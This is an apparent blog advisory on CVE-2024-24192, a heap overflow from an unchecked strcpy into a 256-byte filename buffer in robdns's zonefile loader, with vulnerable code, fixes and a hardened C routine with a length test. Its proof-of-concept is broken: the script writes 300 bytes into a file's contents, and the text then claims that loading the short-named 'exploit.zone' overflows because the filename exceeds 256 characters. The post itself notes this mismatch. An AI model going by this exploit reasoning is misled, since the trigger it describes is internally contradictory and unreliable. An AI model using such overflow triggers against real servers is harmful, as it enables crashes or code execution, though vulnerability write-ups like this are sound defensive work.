A serious security vulnerability, CVE-2024-24192, was found in robdns, an open-source DNS server project. The flaw was introduced in commit d76d2e6 and lies in the handling of filename data within the zonefile-insertion.c file. Attackers can trigger a heap overflow by sending a specially crafted filename, making the DNS server crash, behave abnormally, or even execute arbitrary code.
Below, we’ll walk through what happened, how it works, and how attackers can exploit it.
What Is the Vulnerability?
In the robdns source, filenames are used in the process of loading DNS zone files. The affected code allocates a heap buffer to copy the filename, but it doesn’t properly check that the filename fits in the allocated space.
The problematic code is in zonefile-insertion.c:
block = (struct zonefile_block *)calloc(1, sizeof(*block));
strcpy(block->filename, filename); // <-- vulnerable line
If filename is longer than the space allocated for block->filename, the memory after the buffer gets overwritten—this is a heap buffer overflow.
The unchecked strcpy copies data beyond the buffer.
With crafted input, this can lead to memory corruption, process crash or, sometimes, remote code execution if the attacker controls the overflow data.
Let’s look at the code more closely.
Snippet from /src/zonefile-insertion.c (commit d76d2e6):
struct zonefile_block {
    char filename[256];   // fixed-size buffer: 255 characters plus the NUL
    // ...other fields...
};

void insert_zonefile(const char *filename) {
    struct zonefile_block *block;

    block = (struct zonefile_block *)calloc(1, sizeof(*block));
    if (!block) exit(1);
    strcpy(block->filename, filename); // No bounds check!
}
If filename is 257 bytes or longer, the strcpy will write past the end of filename[256], as strcpy does not limit the copy.
Proof-of-Concept Exploit
Here’s how you might trigger this bug on a vulnerable robdns build.
Exploit script (Python):
# Save as exploit.py
# Writes a 300-byte file named exploit.zone. Note that the overflow described
# above is in the filename string handed to the loader, not in the file's
# contents, so the 300-byte body on its own does not reach the vulnerable strcpy.
with open("exploit.zone", "w") as f:
    f.write("A" * 300)
Then, try to make robdns load exploit.zone, for example:
./robdns --zonefile exploit.zone
This should cause a crash, as the filename is longer than 256 chars. A skilled attacker might use a filename payload designed to manipulate memory in a more targeted way.
How to Fix It
Replace the unbounded strcpy with a bounded copy. strncpy stops at the size you give it but does not add a terminator when the source is too long, so terminate the buffer explicitly:
strncpy(block->filename, filename, sizeof(block->filename) - 1);
block->filename[sizeof(block->filename) - 1] = '\0';
Or, more simply, use snprintf, which always NUL-terminates and truncates to the buffer size:
snprintf(block->filename, sizeof(block->filename), "%s", filename);
Both variants silently truncate an over-long name. That is safe for memory, but the server then works with a path other than the one it was given; measuring the name up front and rejecting anything that does not fit is the stricter option.
References
- Original robdns commit d76d2e6
- NVD entry for CVE-2024-24192 (link may be delayed)
- Heap Overflow explained - Wikipedia
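As an added example (not code from robdns or from the original post), here is a hardened stand-in for insert_zonefile() that measures the name before copying and rejects anything that cannot fit with its terminator, together with a helper that feeds it constructed names of a given length, including the 300-byte case from the proof of concept. The names insert_zonefile_checked, name_of_length_accepted and the record_count field are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Same layout as the vulnerable struct: a fixed 256-byte name buffer. */
struct zonefile_block {
    char filename[256];
    int  record_count;  /* stands in for "...other fields..." */
};

/* Hardened stand-in for insert_zonefile() (hypothetical, not robdns code):
 * the name is measured first and rejected, not silently truncated, if it
 * cannot fit with its NUL. Returns the block, or NULL on rejection/OOM. */
struct zonefile_block *insert_zonefile_checked(const char *filename)
{
    struct zonefile_block *block;
    /* Scan for the NUL within the buffer size only: an over-long or
     * unterminated name is never read beyond 256 bytes. */
    const char *nul = memchr(filename, '\0', sizeof(block->filename));
    if (nul == NULL)
        return NULL;                 /* 256+ characters: would overflow */
    block = calloc(1, sizeof(*block));
    if (block == NULL)
        return NULL;
    memcpy(block->filename, filename, (size_t)(nul - filename) + 1);
    return block;
}

/* Builds a constructed name of n 'A's (like the page's 300-byte payload)
 * and returns 1 if insert_zonefile_checked() accepts it, else 0. */
int name_of_length_accepted(size_t n)
{
    char *name = malloc(n + 1);
    struct zonefile_block *block;
    if (name == NULL)
        return 0;
    memset(name, 'A', n);
    name[n] = '\0';
    block = insert_zonefile_checked(name);
    free(name);
    if (block == NULL)
        return 0;
    free(block);
    return 1;
}

int main(void)
{
    printf("255-char name accepted: %d\n", name_of_length_accepted(255));
    printf("300-char name accepted: %d\n", name_of_length_accepted(300));
}
```

A 255-character name is the longest that fits; 256 or more is refused before any allocation or copy happens.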
Conclusion
CVE-2024-24192 in robdns is a classic example of why safe string handling is critical in C programming. If you’re running robdns, update as soon as possible, and always review input handling code for buffer overflows.
If you want more technical details or have found a related bug, consider reaching out on the robdns GitHub Issues page. Stay safe!
Timeline
Published on: 06/06/2024 22:15:10 UTC
Last modified on: 10/29/2024 18:25:10 UTC